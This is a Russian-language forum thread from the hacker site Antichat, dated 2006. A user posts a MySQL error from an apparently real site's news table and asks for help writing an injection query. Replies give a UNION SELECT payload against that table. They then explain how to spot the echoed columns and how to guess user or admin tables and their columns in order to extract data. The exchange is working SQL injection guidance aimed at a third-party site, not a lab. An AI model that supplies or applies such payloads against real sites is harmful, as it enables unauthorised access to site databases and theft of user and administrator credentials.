ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу Mysql иньекция
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Mysql иньекция
  #1  
Старый 09.01.2006, 18:32
Аватар для k0ldun
k0ldun
Новичок
Регистрация: 28.12.2005
Сообщений: 27
Провел на форуме:
167272

Репутация: 2
По умолчанию Mysql иньекция
здарова всем, помогите составить запрос
Цитата:
MySQL couldn't execute this query - SELECT id, title, body, status, image, comment, position, DATE_FORMAT(time_insert,'%e.%m.%Y | %H:%i') as new_date FROM evn_news WHERE id = 3682\'
 
Ответить с цитированием

  #2  
Старый 09.01.2006, 21:46
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию
-1+union+select+1,2,3,4,5,6,7,8+from+evn_news/*
 
Ответить с цитированием

  #3  
Старый 09.01.2006, 23:04
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию
далее вместо 1-8 пытаешься подставить слово и ищешь его на страничке.
Если нашел... меняешь evn_news на скажем evn_users или evn_admin может evn_member, а дальше пытаешься угадать столбец
 
Ответить с цитированием

  #4  
Старый 09.01.2006, 23:47
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию
Цитата:
далее вместо 1-8 пытаешься подставить слово и ищешь его на страничке.
Можно просто по цифрам найти, что выводится. Для этого и нумеруют И слово это надо в кавычки обязательно ставить, которые часто экранируются.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL инъекция в MySQL gadjet Уязвимости 13 27.12.2005 21:06
вопрос про mySql уязвимость Kent Уязвимости 6 19.07.2005 01:01
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ